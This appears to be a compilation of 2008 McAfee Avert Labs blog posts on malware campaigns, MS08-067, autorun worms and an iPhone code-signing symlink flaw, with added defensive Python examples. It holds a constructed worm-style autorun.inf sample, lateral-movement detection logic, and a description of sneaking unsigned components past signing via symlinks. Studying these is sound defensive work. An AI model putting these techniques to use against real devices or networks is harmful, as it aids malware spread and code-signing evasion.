It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

Koobface remains active on Facebook

A new variant of Koobface (a worm that spreads over Social Networking sites) was recently making the rounds on Facebook.  Users reported receiving spam messages, such as:

When a user follows the link, they’re redirected to one of many different compromised hosts, which displays a fake error message that the version of Flash is out of date.  Next the user is prompted to download/open flash_player.exe, a new Koobface variant.

If the user chooses to install the executable, a fake error message is displayed.

Facebook is already aware of this threat and is purging the spammed links from their system.  But with dozens of Koobface variants known to exist, the situation is likely to get worse before it gets better.  It’s important to note that spammed links leading to Koobface are likely to come from infected friends, reminiscent of early mass-mailing worms.  The safe-computing practice created more than 10 years ago still applies today, which is not to open any unexpected email attachments, even if they are from someone you know.  Only in this context, it must be expanded to the following:

Do not follow any unexpected hyperlinks you receive over the Web, Email, or IM, even if they are received from someone you know.  It’s best to ask the sender to confirm that they intentionally sent such a link.

On the other end of hyperlinks, it’s best to install software and updates from the source (such as adobe.com in this case) rather than trusting the content from a third-party website.

The upcoming DAT release contains detection for the new Koobface variant, while users of McAfee Artemis Technology are already protected in real-time against this threat.

As for the motivations behind this Koobface variant, analysis shows that during infection a proxy server is installed to %ProgramFiles%\tinyproxy\tinyproxy.exe and a service named Security Accounts Manager (SamSs) is created to load the server at startup.   This component listens on TCP port 9090 and proxies all HTTP traffic, in particular looking for traffic to Google, Yahoo, MSN, and Live.com for the purpose of hijacking search results.  Search terms are directed to find-www.net.  This enables ad hijacking and click fraud.

Christmas Worm Uses McDonalds, Coca-Cola as Bait

It’s déjà vu again when Internet scamsters take advantage of the approaching Christmas holidays to entice computer users into opening malicious emails in the guise of holiday promotions or postcards. In the runup to Christmas, every year we see malware authors use varying themes to infect users. And this December is turning out to be no different.

Already in the first week of December, McAfee Avert Labs has observed two active spam campaigns using malware-laced Christmas themes. The first is a spammed e-greeting that links to an IP address hosting an old-school IRC/Bot SFX package. The animated image in the email is taken from a legitimate site, while the bait IP address [202.82.11.4] belongs to a compromised web server based in Hong Kong.

The second threat is a new worm christened W32/Xirtem@MM. This worm has a built-in SMTP engine that mass mails copies of itself to email addresses harvested from an infected machine. It uses subjects ranging from Hallmark E-Cards to McDonalds and Coca-Cola Christmas promotions. And to lend authenticity to the email, the images displayed in the spammed email are directly borrowed from the parent websites of Hallmark, McDonalds, and Coca-Cola.

The worm also has the capabilities of spreading via removable storage devices and peer-to-peer networks. Upon execution, it displays the above picture to trick users into believing that it was a harmless image file.

The upcoming 5453 DATs, to be released today, contain detection for the W32/Xirtem@MM worm, while users of McAfee Artemis Technology are already protected in real-time against these types of threats :-)

In the coming weeks, these tactics will tend to evolve rapidly, from crude to sophisticated, as spammers increasingly use Christmas based themes to lure victims. With the level of sophistication seen in today’s threats, the malicious payload could easily be hidden within layers of obfuscation or clever social engineering, and could fool even the savviest of users who try to inspect an email before opening. It is therefore imperative that users are educated on how to avoid becoming a victim. Visit the McAfee Security Advice Center to learn all about online and computer safety tips to help you stay protected.

Further MS08-067 Woes

MS 08-067 worm

A picture is worth a thousand words…

First let me say, “PATCH your systems” if you have not done so already!

Seriously, you and your machines are sitting ducks for attacks such as MS08-067, which we learned about from Microsoft last month. This type of attack is especially dangerous if your Windows Updates or security products are not up to date. Microsoft released its out-of-cycle emergency patch on the 23rd of October–more than one month ago–so you have no excuse today for being at risk!

At McAfee Avert Labs we have seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in our Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000.

Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The worm continues by setting up an HTTP server that listens on a random port on the victim’s system while hosting a copy of the worm. It then scans for new vulnerable victims to exploit, at which point the new victim will download the worm from the previous victim and so on.

To recap McAfee’s coverage and protection for this vulnerability, please check here. We have increased coverage in today’s DATs (Version 5445) to protect against this, and future variants, of the W32/Conficker.worm.

For more information on the Microsoft vulnerability, refer to their security bulletin.

As many of us enter the holiday season of Thanksgiving it’s vital to ensure your systems are patched and up to date while you’re enjoying your time off. Malware doesn’t break for holidays! ;)

Secure Computing Links With McAfee Avert Labs

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert Labs

More on Autorun-Based Malware

Earlier, my colleague Vinoo Thomas blogged about “The Rise in Autorun-Based Malware” and about a method employed to disable such malware from executing that uses the gpedit.msc tool.

I briefly want to add a couple of points to this:

The Group Policy Editor (gpedit.msc) is a tool provided by Microsoft, and is used to modify various system settings. One such setting is the ability to turn off the autoplay feature.

Changes made using this tool eventually get applied in the Windows registry. For example, when a user modifies settings related to autoplay using the group policy editor, it will be reflected in the following location in the registry:

HKEY_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Key: NoDriveTypeAutoRun

Now, here’s the interesting part. The Group Policy Editor is not available to users of Windows XP Home Edition. Those users would need to manually edit the registry, install TweakUI (a tool available in the PowerToys suite), or download a third-party tool to disable this feature.

Isn’t it odd that Microsoft makes a home user manually edit the registry to turn off this feature, yet it provides a tool for administrators using XP Professional?

I can understand the growing concern many are having with the use of removable devices. There has been a known bug in the NoDriveTypeAutoRun subkey value that causes any changes made to this subkey to revert to its default value.

Of course, the default value enables the autoplay feature to function in all its glory.

All hope is not lost, though, as I managed to find a fix. Save the following text as a .reg file and import it into the registry. And, as always, remember to back up your registry before doing this.

REGEDIT4
[HKEY_Local_Machine\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"

Apparently, this registry value prevents Windows from taking actions based on the Autorun.inf file.

If you are a McAfee VirusScan customer, you could create a custom Access Protection Rule to disable the execution of files named autorun.inf. Many autorun worm variants are detected by McAfee as W32/Autorun.worm.dw.

Finally, Microsoft should implement this autorun feature (which is now exploited by malware) in a more efficient manner. My Ubuntu machine, which has Wine installed, can run Windows executables and has the same autoplay feature as Microsoft does, but with one BIG difference:

Ubuntu Autorun

When a removable device with an autorun.inf file is inserted on my Ubuntu machine, it recognizes that the autorun.inf file is trying to run an executable and then asks for confirmation. Now, that’s what I call prioritizing the user’s security needs!!

Artemis and VirusTotal

Artemis was the Greek goddess of the hunt, forests and hills (http://en.wikipedia.org/wiki/Artemis). It is also the name of McAfee’s new “always-on,” real-time protection technology (http://www.mcafee.com/artemis), which is now available, without charge, in many of the latest McAfee products.

The legendary home of the Greek gods is Mount Olympus, the highest mountain in Greece.

Mount Olympus

Well, today Artemis reached another new level. I am very glad to let you know that VirusTotal (a free service run by the Spanish company Hispasec at http://www.virustotal.com) has just added Artemis scanning to its portal. So, as of today, instead of just one command-line scanner carrying the basic detection technology from McAfee Avert Labs, we are represented by two scanners, labeled “McAfee” and “McAfee+Artemis”. Here is how it looks in the VirusTotal portal:

Map

Let us have a close look at this malware sample. We first saw it this morning at 06:35 UTC. Artemis recorded 32 instances of this file before it was analyzed and detection was added to Artemis. Since that moment and until now (~8 hours after first sighting) we have seen 586 more samples. These samples, of course, were all successfully detected and blocked. The map shows the geographical distribution of the Artemis clients that sent a fingerprint of this malware to the Avert servers.

Map

White dots represent initial submissions (32 of them); red dots, the blocked ones (586 of them).

Thanks to our colleagues at Hispasec for adding our Artemis technology to their site. This provides a great service to the public and to our Avert Labs researchers!

The Rise in Autorun-Based Malware

Most folks associate computer viruses and other prevalent malware with the Internet. Not quite. The earliest computer threats came from the era of floppy disks and removable media. However, with the arrival of the Internet, email and network based attacks became the preferred vector for hackers to spread malicious code and the issues with removable media took a back seat.

Over the years, floppy disks have been replaced by thumb drives, portable hard drives, flash media cards and other forms of removable data storage. Today’s removable devices can hold 10,000 times more data than yesteryear’s floppy disks. Not only can they store more data, today’s removable storage devices are smart, with the ability to run portable software programs or boot an entire operating system.

Given the popularity of removable storage media, virus authors were quick to realize the potential of using this as an infection vector. And they are greatly aided by a convenience feature in operating systems called “Autorun” that exists to automagically launch the content in a removable disk without any user interaction.

McAfee Avert Labs has observed an alarming increase in malware using autorun as an infection vector. In addition to traditional autorun worms that used this feature, pure-play backdoors, password stealers, common Trojans and even parasitic viruses that previously required a user to double click an executable file in order to infect a system have started incorporating the autoplay technique to spread.

To give an example of how rampant the autorun malware problem is in the real world, shown below is the McAfee global virus map, which tracks statistics of infections observed by McAfee users worldwide.

McAfee Virus Map

Generic!atr is the McAfee antivirus detection for the configuration file (autorun.inf) in which the path to the malware executable that needs to autoplay is specified. This detection was observed on over two million files in the last 24 hours and has always been in the top five detections globally ever since the signature was added to the McAfee DAT files. What is shown above are detections seen only on computers with McAfee antivirus installed, where those users have opted into reporting their detections. When you take into account the millions of computers on the Internet and other vendors’ detections of autorun-based threats, one understands how rampant the problem is.

Why is autorun so popular as an infection vector, especially on machines running the Windows operating system? The fact is that autorun is enabled by default on all flavors of Microsoft Windows, including the latest versions of Windows Vista and Windows Server 2008. A user only has to insert a removable disk into an infected machine running Microsoft Windows and the malware will copy itself to the disk and infect it without any additional user interaction. And this self-sustaining cycle continues unabated every time the disk is inserted into a new machine.

So what can a user do to protect themselves against autorun based malware? The autorun feature can easily be disabled via the Windows group policy editor. If you’re a system administrator, it makes sense to disable autoplay via Active Directory and push this policy to the entire enterprise. Prevention is always better than drastic bans of USB disks & drives, although it makes you wonder why Microsoft can’t *fix* this ill-used feature in their next Windows update ;-)
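The two autorun posts above turn on the same two artefacts: the autorun.inf that names the program to launch (what Generic!atr detects) and the NoDriveTypeAutoRun policy value that decides whether Windows acts on it. The following is an added example, not code from either post: it parses an autorun.inf, lists the entries that would launch a program, and checks a policy mask against a drive type. The bit layout follows Microsoft’s documentation of NoDriveTypeAutoRun (bit n corresponds to drive type n as reported by GetDriveType); the sample autorun.inf and the 0x91 mask are constructed for the example.

```python
import re

# Bit layout of the NoDriveTypeAutoRun policy value as documented by Microsoft:
# bit n corresponds to drive type n reported by GetDriveType(), so a set bit
# disables AutoRun for that drive type and 0xFF disables it everywhere.
DRIVE_TYPE_BITS = {
    "removable": 0x04,  # DRIVE_REMOVABLE: USB sticks, floppies
    "fixed": 0x08,      # DRIVE_FIXED: local hard disks
    "remote": 0x10,     # DRIVE_REMOTE: network shares
    "cdrom": 0x20,      # DRIVE_CDROM
    "ramdisk": 0x40,    # DRIVE_RAMDISK
}
DISABLE_ALL = 0xFF

# [autorun] keys that make Windows launch a program; shell\<verb>\command
# entries do the same through the drive's context menu / double-click action.
EXEC_KEYS = ("open", "shellexecute")
SHELL_CMD_RE = re.compile(r"^shell\\[^\\]+\\command$")


def parse_autorun_inf(text):
    """Parse an INI-style autorun.inf into {section: {key: value}}.
    Section and key names are lower-cased; blank and ';' comment lines are skipped."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_commands(text):
    """Return [(key, command)] for every entry that would run a program."""
    autorun = parse_autorun_inf(text).get("autorun", {})
    return [(k, v) for k, v in autorun.items()
            if k in EXEC_KEYS or SHELL_CMD_RE.match(k)]


def autorun_suppressed(no_drive_type_autorun, drive_type):
    """True if the policy mask disables AutoRun for this drive type."""
    return bool(no_drive_type_autorun & DRIVE_TYPE_BITS[drive_type])


def assess(text, no_drive_type_autorun, drive_type="removable"):
    """Triage verdict for one autorun.inf on a host with the given policy mask."""
    if not launch_commands(text):
        return "no launch command"
    if autorun_suppressed(no_drive_type_autorun, drive_type):
        return "launch command present but suppressed by policy"
    return "launch command would run"


# Constructed sample, modelled on the worm configuration files described in
# the text; not a real capture.
SAMPLE_AUTORUN_INF = """
; disguises itself as the normal 'open folder' action
[AutoRun]
Open=RECYCLER\\setup.exe
Icon=%SystemRoot%\\system32\\SHELL32.dll,4
Action=Open folder to view files
shell\\open\\Command=RECYCLER\\setup.exe
"""

if __name__ == "__main__":
    print(launch_commands(SAMPLE_AUTORUN_INF))
    # 0x91 is a constructed permissive mask: the removable-drive bit is clear
    print(assess(SAMPLE_AUTORUN_INF, 0x91))
    print(assess(SAMPLE_AUTORUN_INF, DISABLE_ALL))
```

The mask check models only the NoDriveTypeAutoRun path. The IniFileMapping entry from the earlier post stops Windows from reading autorun.inf at all, so it holds regardless of the mask value and is not affected by the revert-to-default bug described there.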

Intrepid iPhone developers bypass security for functionality

The Apple iPhone is vulnerable to a new bug related to the signing of iPhone applications.  Applications that are created with the official iPhone SDK need to be cryptographically signed by the author and Apple before they’re allowed into the App store or installed on an iPhone.  The digital signing is a security measure that serves two purposes; helping to identify the developer in case of any problems and making sure that an approved application hasn’t been modified.

An iPhone developer discovered the bug while looking for a way to duplicate a feature of Apple-created iPhone applications: dynamic default.png files. The default.png file is displayed when an iPhone application is launched and can be used as a static splash screen. When you quit an Apple-created application, it takes a snapshot of the screen and saves it as default.png within itself. The next time you start the app it loads the new default.png, and everything looks the way it did when the app was last run. The application hasn’t fully loaded yet, but the saved default.png trick makes it look that way.

Unlike Apple’s apps, those created by other developers can’t modify their default.png files. Since default.png is stored within the application as a part of it, it gets digitally signed. Modifying the image file, and thus the app, makes the digital signature invalid. An alternative would be to use a default.png in the application’s data directory, but only the file within the application is supported on the iPhone.

The method to replicate Apple’s default.png trick involves a defect in the codesign utility in the iPhone SDK. codesign is the utility developers use to digitally sign their applications. Normally codesign takes every file within an iPhone application into account when it creates the digital signature. The problem with codesign is that it doesn’t handle symbolic links (symlinks) properly.

Symlinks are like shortcuts to files: if you want to refer to one file in two locations or with two different names, you can create a symlink in the new location. The symlink isn’t a new copy of the file, just a pointer to the original. codesign doesn’t follow the pointer to the original file, so it doesn’t consider that file during signing. The new approach is to create a symlink named default.png that points to a location or file outside of the application that can be easily modified.

This is a neat trick, but harmless on its own. If only the codesign utility had this symlink problem, the technique would not work for an installed application. The real trouble arises when symlinks are used to obscure other program files or components during signing. The digital signature process was intended to ensure that no unapproved or unsafe modifications could occur. An attacker could arrange for malicious components to be installed using a self-update feature. Since the digital signature ignores symlinks, the malicious application could contain pointers to the yet-to-be-downloaded parts. Since the bad portions of the program don’t exist during the approval process, malicious applications can sneak through. This effectively bypasses the iPhone OS’s protection against the running of malicious code.

Fortunately, since the application is signed, tracking down the author of such malware should be considerably easier.  Given that the vulnerability lies within a utility in the iPhone SDK and within the iPhone OS’s verification system, it should be fixed shortly in a future update.
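An added example (not from the post, and not Apple’s codesign) of the check the post says codesign lacked: walk an application bundle without following links and report every symlink whose resolved target lies outside the bundle. The Demo.app bundle, its files and the neighbouring Documents directory are constructed in a temporary directory for the example. A signing tool that performed this check could refuse to sign, or resolve the link and hash the real content instead of the pointer.

```python
import os
import tempfile


def external_symlinks(bundle_dir):
    """Return (relative link path, resolved target) for every symlink under
    bundle_dir whose target resolves outside the bundle. Links are not
    followed while walking, so a link to a directory is reported, not descended."""
    root = os.path.realpath(bundle_dir)
    findings = []
    for dirpath, dirnames, filenames in os.walk(bundle_dir, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)  # resolves '..' and link chains
            if os.path.commonpath([root, target]) != root:
                findings.append((os.path.relpath(path, bundle_dir), target))
    return sorted(findings)


def build_demo_bundle():
    """Constructed fixture (hypothetical Demo.app): one link that stays inside
    the bundle and one that escapes to a writable directory beside it."""
    base = tempfile.mkdtemp(prefix="codesign-demo-")
    bundle = os.path.join(base, "Demo.app")
    outside = os.path.join(base, "Documents")
    os.makedirs(bundle)
    os.makedirs(outside)
    with open(os.path.join(bundle, "default.png"), "wb") as fh:
        fh.write(b"\x89PNG placeholder, part of the signed bundle")
    with open(os.path.join(outside, "default.png"), "wb") as fh:
        fh.write(b"\x89PNG swapped at runtime, never signed")
    # harmless: a relative link that resolves inside the signed tree
    os.symlink("default.png", os.path.join(bundle, "default-alias.png"))
    # the trick from the post: a link whose target lives outside the bundle
    os.symlink(os.path.join("..", "Documents", "default.png"),
               os.path.join(bundle, "default-live.png"))
    return bundle


def demo():
    """Names of the links a signing tool should refuse or resolve before hashing."""
    return [link for link, _ in external_symlinks(build_demo_bundle())]


if __name__ == "__main__":
    for link, target in external_symlinks(build_demo_bundle()):
        print(f"{link} -> {target}  (outside the bundle)")
```

Dangling links are reported too, since a target that does not exist at signing time is exactly the self-update case the post describes.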

Exploit-MS08-067 Bundled in Commercial Malware Kit

Probably the most widely reported topic in the Chinese security community this month will be the availability of a commercial MS08-067 attack pack customized for Chinese users. On October 26th, 2008, exploit code was posted to a well-known public repository site. Within a few days, the malware kit author WolfTeeth was quick to sell an MS08-067 port-scanning tool with attack capability to his “customers”, using free code from the Internet.

WolfTeeth

Taking a peek into his “malware shop”, one finds a series of malware kits for sale, including a backdoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offer a free version and a commercial version with enhanced features, including:

  • Kernel rootkit.
  • Anti-virus software termination.
  • Weekly anti-virus detection monitoring and evasion service.
  • Web DDOS attack option (using a method to target webservers using expensive HTTP requests such as an active web application site).

The seller invites interested “customers” to contact him for a quote, but on another page he has publicly priced an AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features to terminate popular anti-virus software in China, download updates, and remain stealthy.

AdClicker for Sale Site

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and is sold for “research use” only. For customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet, that will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

Fundamental principles of testing anti-malware products from AMTSO.

It is very exciting to see that AMTSO has finally published two documents on its website (http://www.amtso.org/documents/cat_view/13-amtso-principles-and-guidelines.html):

  • AMTSO Fundamental Principles of Testing
  • AMTSO Best Practices for Dynamic Testing

These documents were posted by AMTSO for public comment as RFC versions back in August 2008. Most of the comments from http://blog.amtso.org actually got reflected in the final text, so AMTSO did incorporate many different opinions in its standards, which is a good thing!

The most important thing about these standards is that there is now hope that the quality of anti-malware reviews will improve over time because vendors and testers can work more closely together for the benefit of all computer users.

Here is what Jeff Green, Senior Vice President of McAfee Avert Labs, said about this event: “While there have been many great security software reviews in the past, many poor reviews have confused or misled people. We are glad to see that the Anti-Malware Testing Standards Organization has taken this problem by the horns and formalized the principles of fair testing. This is a significant milestone that should skew the balance towards fair and scientific testing, providing users with a true viewpoint on the security protection vendors provide.”

Let’s hope that there will be more standards from AMTSO and that they will look as good as those just published.

Combating File Infectors on Corporate Networks

In this age of botnets, rootkits, spyware, and other bleeding-edge security threats, file infectors are frequently thought of as a dead threat. Yet we continue to see classic file-infecting viruses enjoy a high degree of success in the wild — causing widespread damage to computer systems. This inspired me to revisit traditional countermeasures used against file-infecting viruses and propose new approaches to improving existing systems.

Last month I got to present my research on this subject at Malware 2008, the 3rd International Conference on Malicious and Unwanted Software. The paper is titled “Combating File Infectors on Corporate Networks”, and presented below is an extract from it:

“We regularly come across simple parasitic infectors that manage to infect every workstation and server on the network. And administrators are at their wits’ end trying to figure out how the simplest of viruses managed to spread and infect every networked machine in so little time and with such stunning effect.

Administrators routinely attend to distress calls from hapless users whenever they have an issue with their workstations. And administrators typically tend to log onto the affected workstation using their own account—which has domain administrative credentials.

For a moment, let us assume the user whose workstation was acting weird was infected with a worm/virus. What could possibly go wrong from here?

Most worms routinely scan for any alive hosts on the network using ICMP or NetBIOS broadcasts and then attempt to connect to the administrative shares of the hosts they find, using the credentials of the currently logged-on user. If the initial login attempt using a regular user account fails, the worm attempts a brute-force attack on the admin account using a predefined list of hard-coded usernames and passwords. Because most corporations have enforced complex password policies these days, brute-forcing is hardly effective.

However, when an administrator logs on to the affected machine using their domain admin account, the worm now runs on the affected machine using the elevated credentials of a domain administrator. Straight away the worm can now infect and spread to any host on the domain using these newly acquired administrative credentials. And in a matter of minutes the entire network with thousands of machines gets infected—by the dumbest of worms. And all this because an ignorant administrator committed the cardinal sin of logging into an infected machine using their own account.”

Interested readers can download a copy of the paper from the McAfee Avert Labs White Papers page.
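The two behaviours the extract describes lend themselves to a detection check: a privileged account logging on interactively to a workstation, and a single source then reaching the admin shares of many hosts in a short window. Below is an added example, not from the paper or the post, that runs both checks over constructed logon records. The record format, the host names and the CORP\admin-smith tier-0 account are all made up for the example; the logon type numbers follow the Windows convention (2 = interactive, 3 = network, 10 = remote interactive).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed policy inputs: which accounts are tier-0 and which shares count
# as administrative. In practice these come from AD group membership.
PRIVILEGED = {"CORP\\admin-smith"}
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}
INTERACTIVE_TYPES = {2, 10}   # console and RDP logons

FIELD_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample records (not real telemetry). A domain admin logs on at
# the console of WS-017 to help a user; moments later WS-017 fans out to the
# admin shares of four other hosts with that admin's credentials.
SAMPLE_LOGONS = [
    "2008-11-20T09:58:01 host=WS-017 user=CORP\\jdoe type=2",
    "2008-11-20T10:02:11 host=WS-017 user=CORP\\admin-smith type=2",
    "2008-11-20T10:03:05 host=WS-018 user=CORP\\admin-smith type=3 share=ADMIN$ src=WS-017",
    "2008-11-20T10:03:06 host=WS-019 user=CORP\\admin-smith type=3 share=ADMIN$ src=WS-017",
    "2008-11-20T10:03:06 host=WS-020 user=CORP\\admin-smith type=3 share=C$ src=WS-017",
    "2008-11-20T10:03:09 host=FS-01 user=CORP\\admin-smith type=3 share=ADMIN$ src=WS-017",
    "2008-11-20T10:15:00 host=FS-01 user=CORP\\svc-backup type=3 share=ADMIN$ src=BK-01",
    "2008-11-20T10:20:00 host=DC-01 user=CORP\\admin-smith type=10",
]


def parse_logon(line):
    """Turn 'timestamp key=value ...' into a dict with a datetime and int type."""
    ts, _, rest = line.partition(" ")
    rec = dict(FIELD_RE.findall(rest))
    rec["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")
    rec["type"] = int(rec["type"])
    return rec


def privileged_interactive_logons(lines, privileged=PRIVILEGED, workstation_prefix="WS-"):
    """The 'cardinal sin' from the paper: a tier-0 account used interactively
    on a workstation. Returns [(host, user)]."""
    hits = []
    for rec in map(parse_logon, lines):
        if (rec["user"] in privileged and rec["type"] in INTERACTIVE_TYPES
                and rec["host"].startswith(workstation_prefix)):
            hits.append((rec["host"], rec["user"]))
    return hits


def admin_share_fanout(lines, window=timedelta(minutes=5), threshold=3):
    """Sources that open admin shares on >= threshold distinct hosts within
    `window`: the worm's spreading pattern once it holds admin credentials.
    Returns {source_host: max distinct targets seen in one window}."""
    by_src = defaultdict(list)
    for rec in map(parse_logon, lines):
        if rec["type"] == 3 and rec.get("share") in ADMIN_SHARES and "src" in rec:
            by_src[rec["src"]].append((rec["time"], rec["host"]))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        best = 0
        for i, (start, _) in enumerate(events):
            hosts = {h for t, h in events[i:] if t - start <= window}
            best = max(best, len(hosts))
        if best >= threshold:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    print("privileged interactive logons:", privileged_interactive_logons(SAMPLE_LOGONS))
    print("admin share fan-out:", admin_share_fanout(SAMPLE_LOGONS))
```

The first check is the preventive one: it fires when the admin logs on, before any spreading, which is where a tiered-administration policy would stop the incident. The second is the containment signal; BK-01 in the sample touches one share and stays below the threshold, so a backup service account does not trip it.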

2008 Presidential Malware review

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both campaigns were hacked during the summer [Security Focus blog], I wanted to give you a short overview of the different malware we saw here at McAfee Avert Labs during the US presidential race.

Due to the high media attention Barack Obama received, it seems that malware authors specifically targeted him rather than John McCain as a means of luring users into clicking on the malware.

One of the first pieces of malware we saw that exploited the campaign was in August. This was a spammed email containing a link to get_flash_updates.exe. The email had the subject “Obama bribes countrymen to win votes”; if the user followed the link, it would download Get_Flash_updates.exe, which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file because it contained offensive language), which was detected as PWS-Banker.cs. The file used the Windows Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also played a video to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe, which Pedro blogged about [Election day is over]. We also went Low Profile on Generic PWS.y!6F939359, which was being discussed on several different sites [Washington Post] [Network World].

Finally, today we also received a new one named Beat_Obama_178.exe. This was a simple downloader that attempts to download a file from a Chinese website. It will be detected as Generic Downloader.Z in tomorrow’s DAT release.

We expect to see several more malicious files using the US presidential election as a social engineering lure to trick users into executing them. So please be on the lookout and keep your security software up to date.

Election Day Is Over, but Election Malware Stays on the Campaign Trail

So, election day is over and the United States has a new president-elect. For malware writers, however, the election is not over yet! Here at Avert Labs we are still seeing seasonal election malware. An interesting one just arrived: it is called BarackObama.exe, of all things. What’s more, it has an American flag icon! How patriotic is that? :)

It turns out this BarackObama.exe is actually the familiar PWS-Banker Trojan, which steals passwords and other user data about bank accounts and sends the information to the malware writer. Another interesting point is that the bank target is not an American bank, but a bank in Peru.

So, it doesn’t matter if you are a Democrat or Republican, the American election remains a nonpartisan opportunity for malware writers to get into your computer–using Barack Obama, John McCain, or even Ralph Nader. :)

Three cheers for ICANN!

… One small step for ICANN …

I never thought I’d see the day!

ICANN has found its dentures down the back of the sofa and taken a bite out of the criminals’ domain registration empire. ESTDomains will no longer be a registrar as of Nov 12th. [pdf]

So I’ve got a question… Who’s got the balls to take on ESTDomains’ problem “customers”?

“ICANN Seeks Expressions of Interest from Registrars to Receive Bulk Transfer of Names from De-Accredited Registrar EstDomains”

I recently presented at APWG to encourage the anti-phishing community that registrars and registries can actually act rather than pleading innocence or the classic “our hands are tied” type excuses. In the case of fast-flux they are probably the only ones that can help in fact. I encouraged participants to point out that registrars and registries are guilty of acting illegally in many jurisdictions by facilitating illegal or infectious sites.

The general stance was that if Directi can clean them out then so can anyone else.

I pointed out that between two registrars (EST and Klik/Vivids) about $1.5M of revenue had passed through Directi (which passes a healthy proportion of it on to Verisign, etc.). I concluded with a slide to motivate participants to “Hug a Registrar”, and I implore our readers to help out too. Anyone scoring over 30% on this URIBL page is a prime candidate for advocates in the community to reach out to and “help”.

So here is my top 5 for today:

#1 Moniker - Infested with spammers and pirated software sites. (MS Office isn’t €79.95 delivered in a zip file.)
#2 XIN NET - This is where the pill spammers moved to, and they have given the .cn TLD a bad name.
#3 35 Tech & OnlineNic - Same as above, but with more variety in pill sites and some casinos thrown in too.
#4 Planet Online - (Surprised to see them so high.) Home of the unique-URL “snowshoe” spammers. Almost legit? The real world doesn’t care for their bulk and WHOIS-protected domains (via Directi’s LogicBoxes), or their fake contacts.
#5 Dynamic Dolphin - Owned by Scott Richter’s Media Breakaway, formerly the bankrupted OptInRealBig. MS won cases against him in New York in 2005. This accreditation is probably against ICANN’s policy. These days they generally annoy via social networks.
#Bonus - *.directNIC [Mikko’s open letter]

This is almost two years too late and took far too much media attention to shake their tree. The worst of the criminals left EST for other registrars after the “defecation met the rotary oscillator” in August, but nevertheless (so I’m told) this is quick for ICANN ;)

Hip Hip…

First Glimpse into MS08-067 Exploits In The Wild

It has been over two years since I last wrote about malware exploiting a major vulnerability in the Windows Server Service (MS06-040).

In 2006, worm authors were quick to adopt the remote exploit, just four days after a security update was released as part of the regular Patch Tuesday: IRC-Mocbot, W32/Sdbot, W32/Spybot, W32/Opanki, etc.

Now, in 2008, we are faced with malware authors who are motivated by profit, more organized, and more likely to target zero-day vulnerabilities, as we have reported on several critical incidents discovered since 2006. Like déjà vu, Microsoft released an out-of-cycle security update today to address in-the-wild attacks against a new vulnerability, MS08-067, targeting the same Windows Server Service.

